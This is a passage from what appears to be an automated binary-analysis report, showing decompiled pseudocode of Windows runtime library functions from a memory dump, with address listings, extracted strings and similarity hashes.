										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00FB6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00FB76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01048938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00FAB150();
													}
													_t116 = E01046D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00FB75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1098638; // 0x0
																	_t122 = L00FB38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00FB76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00FB76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00FDFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00FB70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00FDFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00FDFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00FDFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00FDFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00FDFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1097b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1097b84 = _t75;
						_t73 = E00FBEB70(_t134, 0x1097b60);
						if( *0x1097b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00FBFF60( *0x1097b20);
							}
						}
						goto L5;
					}
				}
			}

0x00fdfab0
0x00fdfab2
0x00fdfab3
0x00fdfab4
0x00fdfabc
0x00fdfac0
0x00fdfb14
0x00fdfb17
0x00fdfac2
0x00fdfac8
0x00fdfacd
0x00fdfad3
0x00fdfad3
0x00fdfadd
0x00fdfb18
0x00fdfb1b
0x00fdfb1d
0x00fdfb1e
0x00fdfb1f
0x00fdfb20
0x00fdfb21
0x00fdfb22
0x00fdfb23
0x00fdfb24
0x00fdfb25
0x00fdfb26
0x00fdfb27
0x00fdfb28
0x00fdfb29
0x00fdfb2a
0x00fdfb2b
0x00fdfb2c
0x00fdfb2d
0x00fdfb2e
0x00fdfb2f
0x00fdfb3a
0x00fdfb3b
0x00fdfb3e
0x00fdfb41
0x00fdfb44
0x00fdfb47
0x00fdfb4a
0x00fdfb4d
0x00fdfb53
0x0101bdcb
0x0101bdcb
0x00fdfb59
0x00fdfb5b
0x00fdfb5b
0x00fdfb5e
0x0101bdd5
0x0101bdd8
0x00000000
0x0101bdda
0x00000000
0x0101bdda
0x00fdfb64
0x00fdfb64
0x00fdfb64
0x00fdfb67
0x00fdfb6e
0x00fdfb70
0x00fdfb72
0x00000000
0x00fdfb78
0x00fdfb7a
0x00fdfb7a
0x00fdfb7d
0x00fdfb80
0x0101bddf
0x0101bde1
0x00000000
0x0101bde3
0x00000000
0x0101bde3
0x00fdfb86
0x00fdfb86
0x00fdfb86
0x00fdfb8b
0x00fdfb90
0x00fdfb92
0x00fdfb94
0x00fdfb9a
0x00fdfb9b
0x00fdfba1
0x0101bde8
0x0101bdeb
0x0101bded
0x0101beb5
0x0101beb5
0x0101bebb
0x0101bebd
0x0101bec3
0x0101bed2
0x0101bedd
0x0101bedd
0x0101beed
0x00000000
0x0101bdf3
0x0101bdfe
0x0101be06
0x0101be0b
0x0101be0d
0x0101be0f
0x0101be14
0x0101be19
0x0101be20
0x0101be25
0x0101be27
0x0101be35
0x0101be39
0x0101be46
0x0101be4f
0x0101be54
0x0101be56
0x0101bef8
0x0101bef8
0x00000000
0x0101be5c
0x0101be5c
0x0101be60
0x00000000
0x0101be66
0x0101be66
0x0101be7f
0x0101be84
0x0101be87
0x0101be89
0x0101be8b
0x0101be99
0x0101be9d
0x0101bea0
0x0101beac
0x0101beaf
0x0101beb1
0x0101beb3
0x0101beb3
0x00000000
0x0101bea2
0x0101bea2
0x00000000
0x0101bea2
0x0101be8d
0x0101be8d
0x0101be92
0x00000000
0x0101be92
0x0101be8b
0x0101be60
0x0101be3b
0x0101be3b
0x0101be3e
0x00000000
0x0101be40
0x0101be40
0x0101be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0101be44
0x0101be3e
0x0101be29
0x0101be29
0x00000000
0x0101be29
0x0101be27
0x00000000
0x00fdfba7
0x00fdfba7
0x00fdfbab
0x0101bf02
0x00fdfbb1
0x00fdfbb1
0x00fdfbb8
0x00fdfbbd
0x00fdfbbd
0x00fdfbbf
0x00fdfbbf
0x00fdfbc5
0x00fdfbcb
0x00fdfbf8
0x00fdfbf8
0x00fdfbfa
0x00000000
0x00fdfc00
0x00fdfc00
0x00fdfc03
0x00000000
0x00fdfc09
0x00fdfc09
0x00fdfc0f
0x00fdfc15
0x00fdfc23
0x00fdfc23
0x00fdfc25
0x00fdfc27
0x00fdfc75
0x00fdfc7c
0x00fdfc84
0x00000000
0x00fdfc29
0x00fdfc29
0x00fdfc2d
0x00fdfc30
0x0101bf0f
0x00000000
0x00fdfc36
0x00fdfc38
0x00fdfc3b
0x00fdfc41
0x0101bf17
0x0101bf19
0x0101bf48
0x0101bf4b
0x00000000
0x0101bf1b
0x0101bf22
0x0101bf24
0x0101bf26
0x00000000
0x0101bf2c
0x0101bf37
0x0101bf39
0x0101bf3b
0x00000000
0x0101bf41
0x0101bf41
0x0101bf41
0x0101bf41
0x0101bf45
0x00000000
0x0101bf45
0x0101bf3b
0x0101bf26
0x00000000
0x00fdfc47
0x00fdfc47
0x00fdfc49
0x00fdfcb2
0x00fdfcb4
0x00fdfcb6
0x00fdfcdc
0x00fdfcdc
0x00000000
0x00fdfcb8
0x00fdfcc3
0x00fdfcc5
0x00fdfcc7
0x00000000
0x00fdfcc9
0x00fdfcc9
0x00fdfccd
0x00000000
0x00fdfccd
0x00fdfcc7
0x00000000
0x00fdfc4b
0x00fdfc4b
0x00fdfc4e
0x00fdfc4e
0x00fdfc51
0x00fdfc51
0x00fdfc54
0x00fdfc5a
0x00fdfc5c
0x00fdfc5f
0x00fdfc61
0x00fdfc63
0x00fdfc65
0x00fdfc67
0x00fdfc6e
0x00fdfc72
0x00fdfc72
0x00fdfc72
0x00fdfc72
0x00fdfc67
0x00fdfc61
0x00000000
0x00fdfc5a
0x00fdfc49
0x00fdfc41
0x00fdfc30
0x00fdfc27
0x00fdfc03
0x00fdfbcd
0x00fdfbd3
0x00fdfbd9
0x00fdfbdc
0x00fdfbde
0x00fdfc99
0x00fdfc9b
0x00fdfc9d
0x00fdfcd5
0x00fdfcd5
0x00fdfc89
0x00fdfc89
0x00000000
0x00fdfc9f
0x00fdfc9f
0x00fdfca3
0x00000000
0x00fdfca3
0x00000000
0x00fdfbe4
0x00fdfbe4
0x00fdfbe4
0x00fdfbe4
0x00fdfbe9
0x00fdfbf2
0x00000000
0x00fdfbf2
0x00fdfbde
0x00fdfbcb
0x00fdfbab
0x00fdfc8b
0x00fdfc8b
0x00fdfc8c
0x00fdfb80
0x00fdfb72
0x00fdfb5e
0x00fdfc8d
0x00fdfc91
0x00fdfadf
0x00fdfadf
0x00fdfae1
0x00fdfae4
0x00fdfae7
0x00fdfaec
0x00fdfaf8
0x00fdfb00
0x00fdfb07
0x00fdfb0f
0x00fdfb0f
0x00fdfb07
0x00000000
0x00fdfaf8
0x00fdfadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0101BE0F

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 81726e878ee56934741d7e8d9e092df6de7b9dfdbe6801b3c68faf95a64f22dc
Instruction ID: 600136efbd0ab8d9c2e886aa67ec98a716a0a6ba9fda93369e76f2d9bca456bc
Opcode Fuzzy Hash: 81726e878ee56934741d7e8d9e092df6de7b9dfdbe6801b3c68faf95a64f22dc
Instruction Fuzzy Hash: 56A11832B106068BDB25DB68C850BBA77F6AF44720F08457BE947CB781DB38D905EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FA2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00FA2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1095350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1097bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00FE97C0();
				}
				if( *0x10979c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x10979c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00FD1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00FC7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0103FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00FE9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00FDE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00FFDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1096901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1096901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00FE9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00FE95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00FC7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00FC7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01027016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0103FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1095350;
							if(_t109 != 0x1095350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0103FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01035720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00fa2d8a
0x00fa2d8a
0x00fa2d92
0x00fa2d96
0x00fa2d9e
0x00fa2da0
0x00fa2da3
0x00fa2da5
0x00fa2da8
0x00fa2dab
0x00fa2db2
0x00fff9aa
0x00fff9ab
0x00fff9ae
0x00fff9ae
0x00fa2db8
0x00fa2dc2
0x00fff9b9
0x00fff9be
0x00fff9bf
0x00fff9bf
0x00fa2dcf
0x00fff9c9
0x00fa2dd5
0x00fa2dd5
0x00fa2dd5
0x00fa2dde
0x00fa2de1
0x00fa2e70
0x00fa2e72
0x00fa2e72
0x00fa2de7
0x00fa2deb
0x00fa2e7c
0x00fa2e83
0x00fa2e85
0x00fa2e8b
0x00fa2e8d
0x00fa2e92
0x00fa2e92
0x00fa2e85
0x00fa2df1
0x00fa2df7
0x00fa2df9
0x00fa2df9
0x00fa2dfc
0x00fa2dff
0x00fa2e02
0x00000000
0x00fa2e05
0x00fa2e0c
0x00fff9d9
0x00fa2e12
0x00fa2e12
0x00fa2e12
0x00fa2e1a
0x00fff9e3
0x00fff9e9
0x00fff9f0
0x00fff9f6
0x00fff9f8
0x00fff9f8
0x00fff9f0
0x00fa2e23
0x00fffa02
0x00fffa03
0x00fffa05
0x00fffa06
0x00000000
0x00fa2e29
0x00fa2e29
0x00fa2e2e
0x00fa2e34
0x00fa2e3e
0x00000000
0x00000000
0x00fa2e44
0x00fa2e47
0x00fa2e4d
0x00000000
0x00000000
0x00fa2e4f
0x00fa2e54
0x00000000
0x00000000
0x00fa2e5a
0x00fa2e5f
0x00fa2e9a
0x00fa2ea4
0x00fa2ea5
0x00fa2ea8
0x00fa2eaf
0x00fa2eb2
0x00fa2eb5
0x00fffae9
0x00fffaeb
0x00fffaed
0x00fffaef
0x00fffaf7
0x00fffaf8
0x00fffafd
0x00fffaff
0x00fffb04
0x00fffb04
0x00fffaff
0x00fa2ec0
0x00fa2ec4
0x00fa2ec6
0x00fa2ec8
0x00fffb14
0x00fffb18
0x00fffb1e
0x00fffb21
0x00fffb21
0x00fa2ece
0x00fa2ece
0x00fa2ece
0x00fa2ed7
0x00fa2e61
0x00fa2e63
0x00fffa6b
0x00fffa71
0x00fffa76
0x00fffa78
0x00fffa8a
0x00fffa7a
0x00fffa83
0x00fffa83
0x00fffa8f
0x00fffa91
0x00fffa97
0x00fffa9d
0x00fffaa4
0x00fffaaa
0x00fffaaf
0x00fffab1
0x00fffac3
0x00fffab3
0x00fffabc
0x00fffabc
0x00fffac8
0x00fffacb
0x00fffadf
0x00fffadf
0x00fffacb
0x00fffaa4
0x00fffa91
0x00fa2e6f
0x00fa2e6f
0x00fa2e5f
0x00fffa13
0x00fffa15
0x00fffa17
0x00fffa1f
0x00fffa21
0x00fffa22
0x00fffa25
0x00fffa28
0x00fffa2f
0x00fffa2f
0x00fffa2a
0x00fffa2a
0x00fffa2a
0x00fffa31
0x00fffa34
0x00fffa36
0x00fffa3c
0x00fffa3e
0x00fffa41
0x00fffa43
0x00fffa45
0x00fffa45
0x00fffa41
0x00fffa3c
0x00fffa4a
0x00fffa4f
0x00fffa51
0x00fffa53
0x00fffa56
0x00fffa5b
0x00fffa5e
0x00000000
0x00fffa5e
0x00fa2e23

Strings

RTL: Re-Waiting, xrefs: 00FFFA4A

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 964a1afc48e46ed2c8357f1bc76c2d4170c000e426713272d968acef6799dda2
Instruction ID: 6ad124574815ed1958ea78e36f273f5742967e7c4ef22d4a3e19f7ce68f47b8a
Opcode Fuzzy Hash: 964a1afc48e46ed2c8357f1bc76c2d4170c000e426713272d968acef6799dda2
Instruction Fuzzy Hash: 976144B1F00209AFCB32DB6CC880B7E77A5EF41320F2402A9E955A72E1C7789D44B791

Uniqueness

Uniqueness Score: -1.00%

Function 01070EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01070EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0106FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01071074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00FE9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0106A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0106A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1098b04 >> 0x14) + (_v44 -  *0x1098b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00FC7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0106138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00FC7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0105FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1098724 & 0x00000008) != 0) {
						E010652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E010715B5(0x1098ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01070eb7
0x01070eb9
0x01070ec0
0x01070ec2
0x01070ecd
0x0107105b
0x0107105b
0x01071061
0x01071066
0x01071066
0x0107106b
0x01071073
0x01071073
0x01070ed3
0x01070ed6
0x01070edc
0x01070ee0
0x01070ee7
0x01070ef0
0x01070ef5
0x01070efa
0x01070efc
0x01070efd
0x01070f03
0x01070f04
0x01070f06
0x01070f07
0x01070f09
0x01070f0e
0x01070f14
0x01070f23
0x01070f2d
0x01070f34
0x01070f34
0x01070f14
0x01070f52
0x00000000
0x00000000
0x01070f58
0x01070f73
0x01070f74
0x01070f79
0x01070f7d
0x01070f80
0x01070f86
0x01070fab
0x01070fb5
0x01070fc6
0x01070fd1
0x01070fe3
0x01070fd3
0x01070fdc
0x01070fdc
0x01070feb
0x01071009
0x01071009
0x01071015
0x01071027
0x01071017
0x01071020
0x01071020
0x0107102f
0x0107103c
0x0107103c
0x01071048
0x01071050
0x01071050
0x01071055
0x00000000
0x01071055
0x01070f88
0x01070f9e
0x01070fa2
0x01070fa9
0x00000000
0x00000000
0x00000000
0x01070fa9
0x00000000

Strings

`, xrefs: 01070F16

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: f7f04bc9d1e18e0ee936668445250686cbf48b0816b2d77b81447576e92abe94
Instruction ID: c13a7947ee74c399f5b370b8ea78c4d7c2476d16fb5a6cfb8e8e865ebbe6a827
Opcode Fuzzy Hash: f7f04bc9d1e18e0ee936668445250686cbf48b0816b2d77b81447576e92abe94
Instruction Fuzzy Hash: 1251CE707043428FD365DF28D880B1BBBE5EBC5300F040A6CFA8697290D671E805CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00FDF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FDF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00FC4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00FE9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00FE9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00FE95D0();
							goto L11;
						} else {
							_t109 = L00FC4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
